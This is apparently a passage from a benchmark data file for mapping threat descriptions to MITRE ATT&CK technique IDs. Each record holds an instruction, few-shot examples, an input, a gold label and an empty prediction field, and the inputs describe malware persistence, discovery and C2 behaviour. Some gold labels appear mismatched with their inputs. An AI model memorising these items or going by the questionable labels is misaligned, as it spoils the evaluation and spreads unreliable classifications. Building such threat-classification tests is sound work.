knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lizar has a module to collect usernames and passwords stored in browsers.\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: FireEye assesses APT33 may be behind a series of intrusions and attempted intrusions within the engineering industry. FireEye's Managed Defense has responded to and contained numerous intrusions that we assess are related. The actor is leveraging publicly available tools in early phases of the intrusion; however, we have observed them transition to custom implants in later stage activity in an attempt to circumvent our detection\n\t - T1555: Credentials from Password Stores\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1552.006: Unsecured Credentials - Group Policy Preferences\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: Fox Kitten has accessed files to gain valid credentials.\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n", "input": "\nA module in gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.", "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CHOPSTICK encrypts C2 communications with TLS.\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n- Text: It first grabs an encrypted blob stored away in a global variable and pulls out 381 bytes of this encrypted data: The standard win32 api CryptDecrypt uses rc4 to decrypt this blob into a hardcoded c2, url path, and url parameters listed below with a simple 140-bit key \u201c\\x8B\\xFF\\x55\\x8B\\xEC\\x83\\xEC\\x50\\xA1\\x84\\x18\\x03\\x68\\x33\\xC9\\x66\\xF7\\x45\\x10\\xE8\\x1F\\x89\\x45\\xFC\\x8B\\x45\\x14\\x56\u2033\n\t - T1573: Encrypted Channel\n- Text: Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nThe C&C server then replies with the encrypted serialized configuration", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The first thread is responsible for taking a screenshot of the desktop of the victim machine. This screenshot data is both compressed and encrypted using a single-byte xor key of 0x5F. This data is written to one of the following files\n\t - T1113: Screen Capture\n- Text: NETWIRE can discover and close windows on controlled systems.\n\t - T1010: Application Window Discovery\n- Text: Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n", "input": "\nCan capture all screen (\u201cAllScreen\u201d) or the active window (\u201cActiveWindow\u201d) -ms Screenshot file name to save in Cache006 subdirectory, zipped with password from configuration", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: To obtain a job, the Trojan builds a subdomain that has the following structure and issues a DNS query to the C2 server: cc The generated subdomain is then subjected to a number-to-character substitution function that is the inverse of the Table 4, which effectively converts all the digits in the subdomain into characters\n\t - T1082: System Information Discovery\n- Text: Caterpillar WebShell can gather the IP address from the victim's machine using the IP config command.\n\t - T1016: System Network Configuration Discovery\n- Text: Doki has searched for the current process\u2019s PID.\n\t - T1057: Process Discovery\n", "input": "\ncan collect system information.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: File Indicators Samples Observed from Spear Phishing Messages Above Filename Chinas_Arctic_Dream.doc File Size 6587812 bytes MD5 598eeb6a18233023f3551097aa49b083 SHA1 e9a46966f93fe15c22636a5033c61c725add8fa5 Notes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe\n\t - T1036: Masquerading\n\t - T1083: File and Directory Discovery\n- Text: WindTail can identify and add files that possess specific file extensions to an array for archiving.\n\t - T1119: Automated Collection\n- Text: ComRAT can check the victim's default browser to determine which process to inject its communications module into.\n\t - T1518: Software Discovery\n", "input": "\nscans the victim for files that contain certain keywords from a list that is obtained from the C2 as a text file. It also collects information about installed software.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Earth Lusca has used Tasklist to obtain information from a compromised host.\n\t - T1007: System Service Discovery\n\t - T1057: Process Discovery\n- Text: If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components\n\t - T1569.002: System Services - Service Execution\n- Text: An APT19 Port 22 malware variant registers itself as a service.\n\t - T1543.003: Create or Modify System Process - Windows Service\n", "input": "\nmay use net start to display running services.", "gold": "- T1007: System Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\t - T1025: Data from Removable Media\n\t - T1543: Create or Modify System Process\n\t - T1005: Data from Local System\n\t - T1091: Replication Through Removable Media\n- Text: GALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network\n\t - T1570: Lateral Tool Transfer\n- Text: USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim.\n\t - T1092: Communication Through Removable Media\n", "input": "\nhas functionality to copy itself to removable media.", "gold": "- T1091: Replication Through Removable Media", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- Text: As part of the exploitation process, the above value will be written to the registry under the %windir% variable, and deleted after execution\n\t - T1112: Modify Registry\n- Text: Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nadded the registry value ntdll to the Registry Run key to establish persistence.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kwampirs collects a list of domain groups with the command \"net localgroup /domain\".\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: The module gathers information about the user and attempts to verify whether this is a local admin or a domain admin. This shows that after infecting the machine, Valak chooses to target mainly administrators and domain admins. This indicates a propensity to target higher profile accounts such as enterprise admins\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n- Text: JPIN can obtain the permissions of the victim user.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", "input": "\nused batch scripts to enumerate administrators in the environment.", "gold": "- T1069: Permission Groups Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Tropic Trooper delivered malicious documents with the XLSX extension, typically used by OpenXML documents, but the file itself was actually an OLE (XLS) document.\n\t - T1221: Template Injection\n- Text: BITTER has attempted to lure victims into opening malicious attachments delivered via spearphishing.\n\t - T1204.002: User Execution - Malicious File\n- Text: For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\n.iqy files are simple text files containing a URL which are opened by default by Excel", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao has scanned for open ports and used nbtscan to find NETBIOS nameservers.\n\t - T1046: Network Service Discovery\n- Text: In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1595: Active Scanning\n- Text: TeamTNT has scanned specific lists of target IP addresses.\n\t - T1595.001: Active Scanning - Scanning IP Blocks\n", "input": "\nscans to identify open ports on the victim.", "gold": "- T1046: Network Service Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: An APT19 HTTP malware variant decrypts strings using single-byte XOR keys.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1057: Process Discovery\n- Text: The WhiteBear binary loader maintains several features including two injection methods for its (oddly named) \u201cKernelInjector\u201d subsystem, also named by its developer \u2013 Standart \u2013 WindowInject (includes an unusual technique for remotely placing code into memory for subsequent thread execution\n\t - T1055.003: Process Injection - Thread Execution Hijacking\n", "input": "\nThe shellcode decodes and decompresses another DLL, which is an updated variant of UPPERCUT", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Grandoreiro can determine the time on the victim machine via IPinfo.\n\t - T1124: System Time Discovery\n- Text: SDBbot can collected the country code of a compromised machine.\n\t - T1614: System Location Discovery\n", "input": "\nCadelle and Chafer are most active during the day time within Iran\u2019s time zone and primarily operate during Iran\u2019s business week (Saturday through Thursday)", "gold": "- T1124: System Time Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can manipulate Registry keys.\n\t - T1112: Modify Registry\n- Text: Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Snippets of HOLMIUM PowerShell backdoor (POWERTON) implementing two different persistence mechanisms: WMI event subscription (T1084) and Registry run keys or Startup folder (T1060\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n", "input": "\nmodified the Registry to perform multiple techniques through the use of .", "gold": "- T1112: Modify Registry", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RTM has the capability to download a VNC module from command and control (C2).\n\t - T1219: Remote Access Software\n- Text: FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.\n\t - T1059: Command and Scripting Interpreter\n- Text: Maintain Presence APT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment\n\t - T1505.003: Server Software Component - Web Shell\n", "input": "\ncreates a backdoor through which remote attackers can open a command line interface.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chinese state-sponsored cyber actors have been observed: \uf0b7 Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI). \uf0b7 Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \uf0b7 Employing Python scripts to exploit vulnerable servers. \uf0b7 Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n\t - T1059.006: Command and Scripting Interpreter - Python\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n\t - T1059.008: Command and Scripting Interpreter - Network Device CLI\n- Text: Trojan.Karagany can perform reconnaissance commands on a victim machine via a cmd.exe process.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration. China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n", "input": "\nOtherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>:[command]<>[parameters for command in hexadecimal format] The available commands are: Command Description 1 Run command 2 Upload a file 3 Download a specified file \u00a0 The parameters for each command are issued in hexadecimal format", "gold": "- T1070.006: Indicator Removal - Timestomp\n- T1016: System Network Configuration Discovery\n- T1059: Command and Scripting Interpreter\n- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In addition to the aforementioned DOCX file, we found another related DDE enabled document based on an infrastructure overlap with a Zebrocy C2 IP address. This related delivery document was an RTF file that downloaded and installed a payload used to load the open-source Koadic tool. We do not have telemetry on the target or attack vector, but we know the RTF file used DDE to download and execute an executable that loaded Koadic. We believe the actor used a cryptor on the payload, as it obtains a filename and script from within its resources and decodes these resources by multiplying each byte by negative one. The payload then uses the MD5 hash (14331d289e737093994395d3fc412afc) of what appears to be a hardcoded SHA1 hash (B6A75B1EF701710D7AEADE0FE93DE8477F3BD506) as an RC4 key to decrypts the resulting decoded data. The embedded VBScript is retrieved from a resource and decrypted using the same algorithm as discussed above, which results in the following cleartext\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: During C0015, the threat actors used Base64-encoded strings.\n\t - T1027: Obfuscated Files or Information\n- Text: Dtrack has used a dropper that embeds an encrypted payload as extra data.\n\t - T1027: Obfuscated Files or Information\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n", "input": "\ndecodes the configuration data and modules.", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aria-body starts with gathering data on the victim\u2019s machine, including: Host-name, computer-name, username, domain name, windows version, processor ~MHz, MachineGuid, 64bit or not, and public IP (using checkip.amazonaws.com\n\t - T1016: System Network Configuration Discovery\n\t - T1082: System Information Discovery\n- Text: It also attempts to issue the following SQL query on the \u201csignons.sqlite\u201d file: \u201cSELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins WHERE timePasswordChanged/1000 BETWEEN ? AND ?\u201d 117 ftpUpload Uses FTPManager:uploadFile method and a supplied server name, username and password\n\t - T1033: System Owner/User Discovery\n- Text: A keylogging tool used by APT3 gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.\n\t - T1016: System Network Configuration Discovery\n", "input": "\ncan gather the victim computer name.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carbon has a command to inject code into a process.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: Nibatad is also a loader that leverages search order hijacking, and downloads an encrypted payload to the infected computer.\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: The\u202fSodomMain\u202fmodule is\u202fLookBack\u202fmalware\u2019s remote access Trojan module that can send and receive numerous commands indicative of its function as a RAT. The malware is delivered within the encoded data\u202fthat is received by the\u202fSodomNormal\u202fmodule as part of its initial beacon response. It then runs within the\u202fSodomNormal\u202fmodule and\u202fuses its\u202f\u201csend_data\u201d\u202ffunction for C&C communications\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", "input": "\nIf running with administrator privileges on a 32-bit host: Copy the temporary DLL in %TEMP% to %WINDOWS%\\LINKINFO.dll Otherwise: Copy the temporary DLL in %TEMP% to %APPDATA%\\cnagnt.dll Delete the temporary DLL in %TEMP% Write a \u2018Conime.lnk\u2019 file in the user\u2019s startup path", "gold": "- T1055: Process Injection\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- T1070.004: Indicator Removal - File Deletion\n- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: gh0st RAT has used Zlib to compress C2 communications data before encrypting it.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: encodes C2 traffic with base64.\n\t - T1132: Data Encoding\n- Text: Cyclops Blink can use a custom binary scheme to encode messages with specific commands and parameters to be executed.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", "input": "\nThis encoded information then gets an additional header added and sent across the network.", "gold": "- T1132: Data Encoding", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POWRUNER can execute commands from its C2 server.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: provides a reverse shell on the victim.\n\t - T1059: Command and Scripting Interpreter\n- Text: Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.\n\t - T1049: System Network Connections Discovery\n", "input": "\nuses cmd.exe to execute netshcommands.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: COM and execution in same sentence\n\t - T1021.003: Remote Services - Distributed Component Object Model\n- Text: Like the ChinaChopper web shell, the OwaAuth web shell requires a password\n\t - T1059: Command and Scripting Interpreter\n\t - T1505.003: Server Software Component - Web Shell\n- Text: BabyShark has used cmd.exe to execute commands.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", "input": "\nAccess remote objects interactively from the pupy shell and get auto-completion of remote attributes", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor \u2013 but that's a totally different threat with different functionality. When loaded, its exported function DllEntryPoint() will be called automatically. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it\u2019s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive\n\t - T1091: Replication Through Removable Media\n- Text: copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.\n\t - T1080: Taint Shared Content\n- Text: Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system\u2019s defenses.\n\t - T1588.002: Obtain Capabilities - Tool\n\t - T1562: Impair Defenses\n\t - T1570: Lateral Tool Transfer\n", "input": "\nselective infector modifies executables stored on removable media as a method of spreading across computers.", "gold": "- T1091: Replication Through Removable Media", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Several malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by also collects disk space information and sends it to its C2 server.\n\t - T1082: System Information Discovery\n- Text: In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks.\n\t - T1592.004: Gather Victim Host Information - Client Configurations\n- Text: These infections provide backdoor access that criminals use to determine whether the host is part of an Active Directory (AD) environment. If so, criminals deploy Cobalt Strike and perform reconnaissance to map the network\n\t - T1595: Active Scanning\n\t - T1592: Gather Victim Host Information\n", "input": "\ncollects system information, including the operating system version and hostname.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure.\n\t 